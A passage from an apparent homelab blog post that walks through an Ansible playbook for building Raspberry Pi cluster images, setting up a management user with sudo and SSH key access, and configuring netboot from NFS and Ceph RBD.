</span></span><span style="display:flex;"><span>        <span style="color:#f92672">exclusive</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;ansible.pub&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key_options</span>: <span style="color:#e6db74">&#39;{% if ansible_hostname != &#34;candc&#34; %}from=&#34;10.0.0.200&#34;{% else %}from=&#34;127.0.0.1&#34;{% endif %}&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add foobar to sudoers file</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/sudoers.d/foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;foobar ALL=(ALL:ALL) ALL&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0440</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">validate</span>: <span style="color:#e6db74">&#39;visudo -cf %s&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set foobar password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;{{ foobar_pw | password_hash(&#39;sha512&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set hostname in /etc/hostname</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/hostname</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;^ubuntu$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;{{ hn_hostname }}&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set hostname in /etc/hosts</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/hosts</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;^127\.0\.0\.1 localhost&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;127.0.0.1 localhost {{ hn_hostname }} {{ hn_hostname }}.home&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove quiet setting from kernel command line</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(.*) quiet (.*)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 \2&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove splash setting from kernel command line</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(.*) splash(.*)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 \2&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># with lz4 compression (default in Pi images), something goes wrong with</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># compression, and some files seem to be corrupted when unpacked during boot.</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">switch initrd compression to gzip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs-tools/conf.d/raspi-lz4.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;COMPRESS=gzip&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;^COMPRESS=lz4$&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prevent automatic backups of files in /boot/firmware</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/default/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;NO_CREATE_DOT_BAK_FILES=yes&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup netboot</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Remove /boot/firmware dependency for cloud-init-local service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/cloud-init-local.service.d/mount-seed.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; </span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create directory for rpi eeprom service file dropin</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add dependency on boot/firmware mount for rpi eeprom service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup name resolution</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;nameserver 10.86.5.254&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install NFS tools</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-common</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/hooks/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-boot-script.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/scripts/rbd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temporarily delete flash-kernel initramfs hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install linux-modules-extra to get rbd kernel module</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">linux-modules-extra-raspi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restore flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">copy initrd to firmware partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/boot/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/boot/firmware/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old boot partition mount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/fstab</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*/boot/firmware.*&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add NFS based boot partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mount</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ &#39;/boot/firmware&#39; if hn_pi is defined else &#39;/boot&#39;  }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;nfs-host:/picluster-boot/{{ hn_host_id if hn_pi is defined else hn_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fstype</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">opts</span>: <span style="color:#ae81ff">defaults,timeo=900,_netdev</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">replace temporary resolv.conf with correct symlink</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/run/systemd/resolve/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">link</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">force</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot kernel command line arguments Pi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(^dwc_otg.lpm_enable=0.*)$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 boot=rbd rbdroot=10.0.0.15,10.0.0.12,10.0.0.14:clusteruser:{{ hn_ceph_key }}:pi-cluster:{{ hn_hostname }}::_netdev,noatime&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Add post kernel install chmod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/kernel/postinst.d/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0755&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s go through the playbook piece by piece.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Bootstrap python for ansible</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">gather_facts</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install ansible dependencies</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">raw</span>: <span style="color:#ae81ff">apt -y install python3 sudo</span>
</span></span></code></pre></div><p>This initial play ensures that the necessary tooling for Ansible is installed.
Ansible requires Python 3 for the vast majority of its modules, but provides
the <code>raw</code> module to work without any Python for initial setup.</p>
<h2 id="prepare-an-ansible-user">Prepare an Ansible user</h2>
<p>The next part will introduce a user for later use by Ansible once the image is
deployed. As you might guess, this user is not actually called <code>foobar</code> in my
setup. &#x1f609;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create user foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create_home</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">groups</span>: <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">configure SSH key for foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">authorized_key</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">exclusive</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;ansible.pub&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key_options</span>: <span style="color:#e6db74">&#39;{% if ansible_hostname != &#34;candc&#34; %}from=&#34;10.0.0.200&#34;{% else %}from=&#34;127.0.0.1&#34;{% endif %}&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add foobar to sudoers file</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/sudoers.d/foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;foobar ALL=(ALL:ALL) ALL&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
